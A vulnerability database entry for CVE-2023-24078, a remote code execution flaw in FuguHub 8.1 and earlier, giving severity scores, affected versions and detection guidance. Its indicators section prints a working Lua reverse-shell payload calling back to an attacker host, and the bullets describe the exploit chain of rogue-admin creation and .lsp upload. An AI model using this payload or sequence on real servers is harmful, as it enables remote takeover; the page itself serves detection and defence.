cbcvebase.
CVE-2023-24078
published 2023-02-17

CVE-2023-24078: Real Time Logic FuguHub v8.1 and earlier was discovered to contain a remote code execution (RCE) vulnerability via the component /FuguHub/cmsdocs/.

PriorityP274high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
53.24%
98.8th percentile
Real Time Logic FuguHub v8.1 and earlier was discovered to contain a remote code execution (RCE) vulnerability via the component /FuguHub/cmsdocs/.

Affected

1 ranges
VendorProductVersion rangeFixed in
realtimelogicfuguhub<= 8.1

Detection & IOCsextracted from sources · hover to see the quote

path/FuguHub/cmsdocs/
url/Config-Wizard/wizard/SetAdmin.lsp
url/rtl/protected/wfslinks.lsp
url/fs/cmsdocs/
filenamerev.lsp
url/rev.lsp
commandlocal host, port = "{LHOST}", {LPORT} local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()
  • Monitor for unauthenticated or authenticated POST requests to /Config-Wizard/wizard/SetAdmin.lsp, which the exploit uses to create a rogue admin account if none exists.
  • Detect POST requests uploading files with Content-Type application/octet-stream to /fs/cmsdocs/, particularly files with a .lsp extension, which are server-side Lua script pages executed by FuguHub.
  • Alert on HTTP GET requests to /rev.lsp (or any newly uploaded .lsp file under /fs/cmsdocs/) immediately following a file upload, indicating webshell execution.
  • Look for Lua reverse-shell patterns in uploaded files: use of socket.tcp(), io.popen(), and tcp:receive()/tcp:send() loops, which are characteristic of the exploit payload.
  • Monitor for POST requests to /rtl/protected/wfslinks.lsp with form fields ba_username and ba_password, used by the exploit to authenticate before staging the upload.
  • ·The exploit checks whether an admin account already exists via /Config-Wizard/wizard/SetAdmin.lsp; if the page returns 'User database already saved', it skips account creation and proceeds directly to login. Hardened deployments with existing admin accounts are still vulnerable to the upload stage.
  • ·The file server path used for upload defaults to /fs/cmsdocs/ but the exploit notes it searches for a valid file server link, implying the path prefix (e.g., 'fs') may vary per deployment.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.